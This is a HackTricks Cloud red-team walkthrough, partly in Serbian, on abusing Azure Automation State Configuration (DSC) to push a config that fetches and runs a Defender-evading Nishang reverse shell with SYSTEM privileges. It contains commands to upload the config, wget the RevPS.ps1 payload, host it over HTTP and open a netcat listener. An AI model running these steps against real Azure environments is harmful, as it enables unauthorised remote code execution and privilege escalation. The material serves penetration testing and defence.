Az - State Configuration RCE

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Check the complete post in: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Summary of Remote Server (C2) Infrastructure Preparation and Steps

Overview

Proces uključuje postavljanje infrastrukture udaljenog servera za hostovanje modifikovanog Nishang Invoke-PowerShellTcp.ps1 payload-a, nazvanog RevPS.ps1, dizajniranog da zaobiđe Windows Defender. Payload se servira sa Kali Linux mašine sa IP 40.84.7.74 koristeći jednostavan Python HTTP server. Operacija se izvršava kroz nekoliko koraka:

Step 1 — Create Files

Files Required: Potrebna su dva PowerShell skripta:

reverse_shell_config.ps1: Datoteka Desired State Configuration (DSC) koja preuzima i izvršava payload. Može se preuzeti sa GitHub.
push_reverse_shell_config.ps1: Skript za objavljivanje konfiguracije na VM, dostupan na GitHub.

Customization: Varijable i parametri u ovim datotekama moraju biti prilagođeni specifičnom okruženju korisnika, uključujući imena resursa, putanje do datoteka i identifikatore servera/payload-a.

Step 2 — Zip Configuration File

Datoteka reverse_shell_config.ps1 se kompresuje u .zip datoteku, čineći je spremnom za prenos na Azure Storage Account.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Step 3 — Postavite kontekst skladišta i otpremite

Zipped konfiguracioni fajl se otprema u unapred definisani Azure Storage kontejner, azure-pentest, koristeći Azure-ovu Set-AzStorageBlobContent cmdlet.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Step 4 — Priprema Kali Box-a

Kali server preuzima RevPS.ps1 payload iz GitHub repozitorijuma.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1

Skripta se uređuje da specificira ciljni Windows VM i port za reverznu ljusku.

Step 5 — Publish Configuration File

Konfiguracioni fajl se izvršava, što rezultira u tome da se skripta za reverznu ljusku postavlja na određenu lokaciju na Windows VM.

Step 6 — Host Payload and Setup Listener

Pokreće se Python SimpleHTTPServer za hostovanje payload-a, zajedno sa Netcat slušateljem za hvatanje dolaznih konekcija.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443

Zakazani zadatak izvršava payload, postižući privilegije na nivou SYSTEM-a.

Zaključak

Uspešna izvršenja ovog procesa otvara brojne mogućnosti za dalja delovanja, kao što su dumping kredencijala ili proširenje napada na više VM-ova. Vodič podstiče kontinuirano učenje i kreativnost u oblasti Azure Automation DSC.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAz - Automation Account NextAz - Azure App Service & Function Apps

Last updated 3 days ago